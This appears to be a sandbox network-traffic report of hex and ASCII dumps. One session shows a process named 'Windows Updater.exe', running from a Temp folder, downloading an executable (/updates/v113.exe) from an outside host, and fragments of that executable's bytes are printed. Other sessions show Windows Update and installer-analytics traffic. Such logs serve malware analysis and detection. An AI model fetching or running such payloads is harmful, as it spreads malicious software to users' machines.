                                                                                                                                                                                                                                                                        2023-12-06 13:33:47 UTC1369INData Raw: 00 00 c1 e8 1f c7 45 a0 dc 51 63 00 c7 45 a4 b4 b0 6a 00 c7 45 a8 03 00 00 00 c7 45 ac a4 51 63 00 c7 45 b0 b4 b0 6a 00 c7 45 b4 04 00 00 00 c7 45 b8 50 52 63 00 c7 45 bc c0 b0 6a 00 c7 45 c0 05 00 00 00 c7 45 c4 14 52 63 00 c7 45 c8 cc b0 6a 00 c7 45 cc 08 00 00 00 c7 45 d0 b4 52 63 00 c7 45 d4 c0 b0 6a 00 c7 45 d8 0a 00 00 00 c7 45 dc 7c 52 63 00 c7 45 e0 cc b0 6a 00 c7 45 e4 0d 00 00 00 03 c2 0f 84 ad 00 00 00 3d 55 55 55 15 0f 87 cd 00 00 00 8d 3c 40 c1 e7 02 81 ff 00 10 00 00 72 29 8d 47 23 3b c7 0f 86 b9 00 00 00 50 e8 bb 6e 19 00 8b c8 83 c4 04 85 c9 0f 84 ab 00 00 00 8d 41 23 83 e0 e0 89 48 fc eb 11 85 ff 74 0b 57 e8 99 6e 19 00 83 c4 04 eb 02 33 c0 a3 d8 b0 6a 00 a3 dc b0 6a 00 03 c7 a3 e0 b0 6a 00 c7 45 84 d8 b0 6a 00 c7 45 fc 00 00 00 00 8d 55
                                                                                                                                                                                                                                                                        Data Ascii: EQcEjEEQcEjEEPRcEjEERcEjEERcEjEE|RcEjE=UUU<@r)G#;PnA#HtWn3jjjEjEU
                                                                                                                                                                                                                                                                        2023-12-06 13:33:47 UTC1369INData Raw: ff ff ff 68 b0 b5 61 00 e8 8b 6d 19 00 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b 4d f0 33 cd e8 b1 69 19 00 8b e5 5d c3 e8 2e 41 00 00 e8 99 4d 00 00 e8 43 be 19 00 cc cc cc cc 55 8b ec 6a ff 68 83 ad 5f 00 64 a1 00 00 00 00 50 a1 24 30 6a 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 6a 00 68 00 b2 6a 00 c7 05 64 ab 6a 00 f0 b1 6a 00 ff 15 70 c0 61 00 85 c0 75 1f ff 15 5c c0 61 00 85 c0 7e 0a 0f b7 c0 0d 00 00 07 80 85 c0 79 09 c6 05 50 ab 6a 00 01 eb 0a c7 05 f4 b1 6a 00 24 00 00 00 c7 45 fc 01 00 00 00 c7 05 f0 b1 6a 00 60 c6 63 00 c7 45 fc 02 00 00 00 c7 05 f0 b1 6a 00 54 ca 63 00 c7 05 20 b2 6a 00 00 00 00 00 c7 05 24 b2 6a 00 00 00 00 00 c7 05 28 b2 6a 00 00 00 00 00 c7 45 fc ff ff ff ff 68 30 b6 61 00 e8 a3 6c 19 00 83 c4 04 8b 4d f4 64 89 0d 00
                                                                                                                                                                                                                                                                        Data Ascii: hamMdY_^M3i].AMCUjh_dP$0j3PEdjhjdjjpau\a~yPjj$Ej`cEjTc j$j(jEh0alMd
                                                                                                                                                                                                                                                                        2023-12-06 13:33:47 UTC1369INData Raw: 45 fc ff ff ff ff 68 c0 ba 61 00 e8 2f 68 19 00 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 8b e5 5d c3 68 05 40 00 80 e8 f9 6b 00 00 cc cc cc cc cc cc cc cc cc 68 e0 ba 61 00 e8 00 68 19 00 59 c3 cc cc cc cc b9 74 b2 6a 00 e8 46 35 15 00 68 20 bb 61 00 e8 e6 67 19 00 59 c3 cc cc cc cc cc cc cc cc cc cc b9 94 b2 6a 00 e8 26 35 15 00 68 90 bb 61 00 e8 c6 67 19 00 59 c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 13 e4 60 00 64 a1 00 00 00 00 50 51 a1 24 30 6a 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 c7 45 f0 00 00 00 00 8b 45 f0 6a 2c a3 b4 b2 6a 00 e8 00 64 19 00 83 c4 04 89 00 89 40 04 a3 b8 b2 6a 00 c7 45 fc 00 00 00 00 c7 05 c0 b2 6a 00 00 00 00 00 c7 05 c4 b2 6a 00 00 00 00 00 c7 05 c8 b2 6a 00 00 00 00 00 c6 45 fc 01 b9 c0 b2 6a 00 ff 35 b8 b2 6a 00
                                                                                                                                                                                                                                                                        Data Ascii: Eha/hMdY]h@khahYtjF5h agYj&5hagYUjh`dPQ$0j3PEdEEj,jd@jEjjjEj5j
                                                                                                                                                                                                                                                                        2023-12-06 13:33:47 UTC1369INData Raw: c7 05 00 46 6a 00 00 00 00 00 b9 00 46 6a 00 c7 05 10 46 6a 00 00 00 00 00 c7 05 14 46 6a 00 00 00 00 00 68 14 75 64 00 c7 05 10 46 6a 00 00 00 00 00 c7 05 14 46 6a 00 07 00 00 00 66 a3 00 46 6a 00 e8 05 3d 00 00 c6 45 fc 0d 33 c0 6a 09 c7 05 18 46 6a 00 00 00 00 00 b9 18 46 6a 00 c7 05 28 46 6a 00 00 00 00 00 c7 05 2c 46 6a 00 00 00 00 00 68 8c 5c 64 00 c7 05 28 46 6a 00 00 00 00 00 c7 05 2c 46 6a 00 07 00 00 00 66 a3 18 46 6a 00 e8 b6 3c 00 00 c6 45 fc 0e 33 c0 50 0f 57 c0 c7 05 38 46 6a 00 00 00 00 00 c7 05 48 46 6a 00 00 00 00 00 b9 38 46 6a 00 c7 05 4c 46 6a 00 00 00 00 00 68 4c 74 62 00 66 0f 13 05 30 46 6a 00 c7 05 48 46 6a 00 00 00 00 00 c7 05 4c 46 6a 00 07 00 00 00 66 a3 38 46 6a 00 e8 5d 3c 00 00 c6 45 fc 0f 33 c0 50 c7 05 50 46 6a 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: FjFjFjFjhudFjFjfFj=E3jFjFj(Fj,Fjh\d(Fj,FjfFj<E3PW8FjHFj8FjLFjhLtbf0FjHFjLFjf8Fj]<E3PPFj


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        17192.168.2.550138104.21.32.1004436304C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:48 UTC153OUTGET /updates/v113.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        User-Agent: AdvancedInstaller
                                                                                                                                                                                                                                                                        Host: dl.likeasurfer.com
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2023-12-06 13:33:48 UTC694INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 33 3a 34 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 36 33 35 34 32 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 30 39 20 41 70 72 20 32 30 32 31 20 31 33 3a 32 39 3a 34 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 36 30 37 30 35 36 63 37 2d 33 37 37 38 65 30 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKDate: Wed, 06 Dec 2023 13:33:48 GMTContent-Type: application/octet-streamContent-Length: 3635424Connection: closeLast-Modified: Fri, 09 Apr 2021 13:29:43 GMTETag: "607056c7-3778e0"Cache-Control: max-age=14400CF-Cache-Status:
                                                                                                                                                                                                                                                                        2023-12-06 13:33:48 UTC675INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9b 8c 43 c8 df ed 2d 9b df ed 2d 9b df ed 2d 9b cb 86 2e 9a d2 ed 2d 9b cb 86 28 9a 6a ed 2d 9b b3 99 29 9a cc ed 2d 9b b3 99 2e 9a c8 ed 2d 9b b3 99 28 9a bd ed 2d 9b cb 86 29 9a c5 ed 2d 9b cb 86 2c 9a dc ed 2d 9b cb 86 2a 9a dd ed 2d 9b df ed 2c 9b 1f ef 2d 9b 06 99 24 9a fd ec 2d 9b 06 99 d2 9b de ed 2d 9b df ed ba 9b de ed 2d 9b 06 99 2f 9a de ed 2d 9b 52 69 63 68 df ed 2d
                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$C---.-(j-)-.-(-)-,-*-,-$---/-Rich-
                                                                                                                                                                                                                                                                        2023-12-06 13:33:48 UTC1369INData Raw: 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 93 01 00 00 50 1f 00 00 94 01 00 00 1e 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: @@.relocP@B
                                                                                                                                                                                                                                                                        2023-12-06 13:33:48 UTC1369INData Raw: ff d2 c7 85 9c fe ff ff 00 00 00 00 c7 45 fc 1b 00 00 00 8d 8d a0 fe ff ff 51 8d 45 f0 50 51 e8 c0 f0 02 00 c7 45 fc ff ff ff ff 8d 85 a0 fe ff ff 68 10 f2 42 00 6a 07 6a 30 50 e8 3c 15 12 00 68 10 6c 57 00 e8 a3 10 12 00 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 8b 4d f0 33 cd e8 dd 0d 12 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 68 40 a7 5d 00 ff 15 64 80 57 00 85 c0 75 29 ff 15 3c 80 57 00 85 c0 7e 0a 0f b7 c0 0d 00 00 07 80 85 c0 79 13 68 20 6c 57 00 c6 05 5c c4 5d 00 01 e8 41 10 12 00 59 c3 68 20 6c 57 00 c7 05 30 a7 5d 00 28 00 00 00 e8 2b 10 12 00 59 c3 55 8b ec 6a ff 68 70 ab 54 00 64 a1 00 00 00 00 50 83 ec 0c a1 24 60 5d 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 6a 5c c7 05 38 71 5d 00 48 89 58 00 c7 45 f0 3c 71 5d 00 c7 05 3c
                                                                                                                                                                                                                                                                        Data Ascii: EQEPQEhBjj0P<hlWMdYM3]jh@]dWu)<W~yh lW\]AYh lW0](+YUjhpTdP$`]3PEdj\8q]HXE<q]<
                                                                                                                                                                                                                                                                        2023-12-06 13:33:48 UTC1369INData Raw: 5c c4 5d 00 01 eb 0a c7 05 a8 c5 5d 00 24 00 00 00 c7 45 fc 01 00 00 00 c7 05 a4 c5 5d 00 0c 02 59 00 c7 45 fc 02 00 00 00 c7 05 a4 c5 5d 00 04 06 59 00 c7 05 d4 c5 5d 00 00 00 00 00 c7 05 d8 c5 5d 00 00 00 00 00 c7 05 dc c5 5d 00 00 00 00 00 c7 45 fc ff ff ff ff 68 60 72 57 00 e8 32 0b 12 00 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 8b e5 5d c3 cc cc cc cc cc cc cc 6a 20 68 50 12 59 00 b9 a0 71 5d 00 e8 7f 62 00 00 68 c0 72 57 00 e8 fe 0a 12 00 59 c3 cc cc cc 55 8b ec 6a ff 68 5f ab 55 00 64 a1 00 00 00 00 50 a1 24 60 5d 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 c7 45 fc ff ff ff ff 68 d0 72 57 00 e8 c6 0a 12 00 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 68 20 73 57 00 e8 9f 0a 12 00 59 c3 cc cc cc cc 68 60 73 57
                                                                                                                                                                                                                                                                        Data Ascii: \]]$E]YE]Y]]]Eh`rW2MdY]j hPYq]bhrWYUjh_UdP$`]3PEdEhrWMdY]h sWYh`sW
                                                                                                                                                                                                                                                                        2023-12-06 13:33:48 UTC1369INData Raw: 52 0c 83 c0 10 a3 64 c6 5d 00 c7 45 fc ff ff ff ff 68 00 77 57 00 e8 20 06 12 00 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 8b e5 5d c3 68 05 40 00 80 e8 db 70 00 00 cc cc cc cc cc cc cc cc cc cc cc 68 00 78 57 00 e8 ef 05 12 00 59 c3 cc cc cc cc b9 68 c6 5d 00 e8 f6 f6 0d 00 68 40 78 57 00 e8 d5 05 12 00 59 c3 cc cc cc cc cc cc cc cc cc cc b9 88 c6 5d 00 e8 d6 f6 0d 00 68 b0 78 57 00 e8 b5 05 12 00 59 c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 e3 aa 56 00 64 a1 00 00 00 00 50 51 a1 24 60 5d 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 c7 45 f0 00 00 00 00 8b 45 f0 6a 2c a3 a8 c6 5d 00 e8 04 03 12 00 83 c4 04 89 00 89 40 04 a3 ac c6 5d 00 c7 45 fc 00 00 00 00 c7 05 b4 c6 5d 00 00 00 00 00 c7 05 b8 c6 5d 00 00 00 00 00 c7 05 bc c6 5d 00 00 00 00 00 c6 45
                                                                                                                                                                                                                                                                        Data Ascii: Rd]EhwW MdY]h@phxWYh]h@xWY]hxWYUjhVdPQ$`]3PEdEEj,]@]E]]]E
                                                                                                                                                                                                                                                                        2023-12-06 13:33:48 UTC1369INData Raw: 00 00 c7 05 7c 73 5d 00 07 00 00 00 66 a3 68 73 5d 00 e8 42 58 00 00 c6 45 fc 0e 33 c0 50 0f 57 c0 c7 05 98 73 5d 00 00 00 00 00 c7 05 9c 73 5d 00 00 00 00 00 b9 88 73 5d 00 68 18 39 58 00 66 0f 13 05 80 73 5d 00 c7 05 98 73 5d 00 00 00 00 00 c7 05 9c 73 5d 00 07 00 00 00 66 a3 88 73 5d 00 e8 f3 57 00 00 c6 45 fc 0f 33 c0 50 c7 05 b0 73 5d 00 00 00 00 00 b9 a0 73 5d 00 c7 05 b4 73 5d 00 00 00 00 00 68 18 39 58 00 c7 05 b0 73 5d 00 00 00 00 00 c7 05 b4 73 5d 00 07 00 00 00 66 a3 a0 73 5d 00 e8 af 57 00 00 c6 45 fc 10 33 c0 50 c7 05 c8 73 5d 00 00 00 00 00 b9 b8 73 5d 00 c7 05 cc 73 5d 00 00 00 00 00 68 18 39 58 00 c7 05 c8 73 5d 00 00 00 00 00 c7 05 cc 73 5d 00 07 00 00 00 66 a3 b8 73 5d 00 e8 6b 57 00 00 c6 45 fc 11 33 c0 6a 08 c7 05 e0 73 5d 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: |s]fhs]BXE3PWs]s]s]h9Xfs]s]s]fs]WE3Ps]s]s]h9Xs]s]fs]WE3Ps]s]s]h9Xs]s]fs]kWE3js]
                                                                                                                                                                                                                                                                        2023-12-06 13:33:48 UTC1369INData Raw: 45 fc 21 33 c0 50 c7 05 78 75 5d 00 00 00 00 00 b9 68 75 5d 00 c7 05 7c 75 5d 00 00 00 00 00 68 18 39 58 00 c7 05 78 75 5d 00 00 00 00 00 c7 05 7c 75 5d 00 07 00 00 00 66 a3 68 75 5d 00 e8 bd 52 00 00 c6 45 fc 22 33 c0 50 c7 05 90 75 5d 00 00 00 00 00 b9 80 75 5d 00 c7 05 94 75 5d 00 00 00 00 00 68 18 39 58 00 c7 05 90 75 5d 00 00 00 00 00 c7 05 94 75 5d 00 07 00 00 00 66 a3 80 75 5d 00 e8 79 52 00 00 c6 45 fc 23 33 c0 6a 11 c7 05 a8 75 5d 00 00 00 00 00 b9 98 75 5d 00 c7 05 ac 75 5d 00 00 00 00 00 68 98 9d 59 00 c7 05 a8 75 5d 00 00 00 00 00 c7 05 ac 75 5d 00 07 00 00 00 66 a3 98 75 5d 00 e8 34 52 00 00 c6 45 fc 24 33 c0 6a 04 c7 05 c0 75 5d 00 00 00 00 00 b9 b0 75 5d 00 c7 05 c4 75 5d 00 00 00 00 00 68 d8 a4 59 00 c7 05 c0 75 5d 00 00 00 00 00 c7 05 c4
                                                                                                                                                                                                                                                                        Data Ascii: E!3Pxu]hu]|u]h9Xxu]|u]fhu]RE"3Pu]u]u]h9Xu]u]fu]yRE#3ju]u]u]hYu]u]fu]4RE$3ju]u]u]hYu]
                                                                                                                                                                                                                                                                        2023-12-06 13:33:48 UTC1369INData Raw: 00 b9 48 77 5d 00 68 18 39 58 00 c7 05 58 77 5d 00 00 00 00 00 c7 05 5c 77 5d 00 07 00 00 00 66 a3 48 77 5d 00 e8 7d 4d 00 00 c6 45 fc 35 33 c0 6a 11 c7 05 70 77 5d 00 00 00 00 00 b9 60 77 5d 00 c7 05 74 77 5d 00 00 00 00 00 68 5c 9e 59 00 c7 05 70 77 5d 00 00 00 00 00 c7 05 74 77 5d 00 07 00 00 00 66 a3 60 77 5d 00 e8 38 4d 00 00 c6 45 fc 36 33 c0 6a 04 c7 05 88 77 5d 00 00 00 00 00 b9 78 77 5d 00 c7 05 8c 77 5d 00 00 00 00 00 68 d8 a4 59 00 c7 05 88 77 5d 00 00 00 00 00 c7 05 8c 77 5d 00 07 00 00 00 66 a3 78 77 5d 00 e8 f3 4c 00 00 c6 45 fc 37 33 c0 6a 07 c7 05 a0 77 5d 00 00 00 00 00 b9 90 77 5d 00 c7 05 a4 77 5d 00 00 00 00 00 68 2c c5 58 00 c7 05 a0 77 5d 00 00 00 00 00 c7 05 a4 77 5d 00 07 00 00 00 66 a3 90 77 5d 00 e8 ae 4c 00 00 c6 45 fc 38 33 c0
                                                                                                                                                                                                                                                                        Data Ascii: Hw]h9XXw]\w]fHw]}ME53jpw]`w]tw]h\Ypw]tw]f`w]8ME63jw]xw]w]hYw]w]fxw]LE73jw]w]w]h,Xw]w]fw]LE83
                                                                                                                                                                                                                                                                        2023-12-06 13:33:48 UTC1369INData Raw: 00 c7 05 38 79 5d 00 00 00 00 00 c7 05 3c 79 5d 00 07 00 00 00 66 a3 28 79 5d 00 68 80 9e 59 00 e8 29 48 00 00 c6 45 fc 48 33 c0 6a 04 c7 05 50 79 5d 00 00 00 00 00 b9 40 79 5d 00 c7 05 54 79 5d 00 00 00 00 00 68 d8 a4 59 00 c7 05 50 79 5d 00 00 00 00 00 c7 05 54 79 5d 00 07 00 00 00 66 a3 40 79 5d 00 e8 e4 47 00 00 c6 45 fc 49 33 c0 6a 07 c7 05 68 79 5d 00 00 00 00 00 b9 58 79 5d 00 c7 05 6c 79 5d 00 00 00 00 00 68 14 a5 59 00 c7 05 68 79 5d 00 00 00 00 00 c7 05 6c 79 5d 00 07 00 00 00 66 a3 58 79 5d 00 e8 9f 47 00 00 c6 45 fc 4a 33 c0 6a 0a c7 05 88 79 5d 00 00 00 00 00 b9 78 79 5d 00 c7 05 8c 79 5d 00 00 00 00 00 68 e0 8a 59 00 c7 05 70 79 5d 00 03 00 00 00 c7 05 74 79 5d 00 00 00 00 00 c7 05 88 79 5d 00 00 00 00 00 c7 05 8c 79 5d 00 07 00 00 00 66 a3
                                                                                                                                                                                                                                                                        Data Ascii: 8y]<y]f(y]hY)HEH3jPy]@y]Ty]hYPy]Ty]f@y]GEI3jhy]Xy]ly]hYhy]ly]fXy]GEJ3jy]xy]y]hYpy]ty]y]y]f


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        18192.168.2.55014113.85.23.86443
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:55 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gsFLpk9WD8mr+vo&MD=y8Xsl23L HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                        2023-12-06 13:33:56 UTC560INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 45 78 70 69 72 65 73 3a 20 2d 31 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 30 30 30 31 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 4d 78 31 52 6f 4a 48 2f 71 45 77 70 57 66 4b 6c 6c 78 37 73 62 73 6c 32 38 41 75 45 52 7a 35 49 59 64 63 73 76 74 54 4a 63 67 4d 3d 5f 32 31 36 30 22 0d 0a 4d 53 2d 43 6f 72 72 65 6c 61 74 69 6f 6e 49 64 3a 20 38 35 66 63 33 35 64 66 2d 37 65 36 65 2d 34 65 62 62 2d
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKCache-Control: no-cachePragma: no-cacheContent-Type: application/octet-streamExpires: -1Last-Modified: Mon, 01 Jan 0001 00:00:00 GMTETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"MS-CorrelationId: 85fc35df-7e6e-4ebb-
                                                                                                                                                                                                                                                                        2023-12-06 13:33:56 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                                                                                                                                                                        Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                                                                                                                                                                        2023-12-06 13:33:56 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                                                                                                                                                                        Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        19192.168.2.55014554.165.38.2324438128C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:34:06 UTC241OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                                                                                                                                        User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                                                                                                                                                                                                                                        Host: collect.installeranalytics.com
                                                                                                                                                                                                                                                                        Content-Length: 165
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2023-12-06 13:34:06 UTC165OUTData Raw: 71 74 3d 36 38 34 39 34 39 39 26 74 3d 6c 69 66 65 63 79 63 6c 65 26 6c 63 3d 73 74 61 72 74 26 76 3d 33 26 61 69 64 3d 35 37 62 65 63 37 39 35 31 35 63 31 65 63 35 32 35 66 38 38 35 38 62 66 26 61 76 3d 31 2e 30 2e 30 26 63 69 64 3d 35 37 46 31 41 42 38 39 32 39 46 45 37 32 42 39 45 44 37 39 46 34 35 39 30 43 39 38 42 32 37 44 34 43 30 36 46 42 38 44 26 73 69 64 3d 25 37 42 33 44 34 33 32 30 39 41 2d 30 46 32 38 2d 34 35 34 32 2d 42 37 45 43 2d 45 31 37 33 30 46 35 35 45 45 43 38 25 37 44
                                                                                                                                                                                                                                                                        Data Ascii: qt=6849499&t=lifecycle&lc=start&v=3&aid=57bec79515c1ec525f8858bf&av=1.0.0&cid=57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D&sid=%7B3D43209A-0F28-4542-B7EC-E1730F55EEC8%7D
                                                                                                                                                                                                                                                                        2023-12-06 13:34:06 UTC638INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 32 20 50 61 79 6d 65 6e 74 20 52 65 71 75 69 72 65 64 0d 0a 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 3d 22 73 65 74 2d 63 6f 6f 6b 69 65 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 34 3a 30 36 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 32 2d 76 79 47 70 36 50 76 46 6f 34 52 76 73 46 74 50 6f 49 57 65 43 52 65 79 49 43 38 22 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 41 57 53 45 4c 42 3d 32 39 33 39 39 33 36 46 31 30 32 37 30 44 31 43 43 39 38 32 31 39 36 34 39 39 31 34 30 33 44 38 45 42 33 36 33 44 36 33 44 45
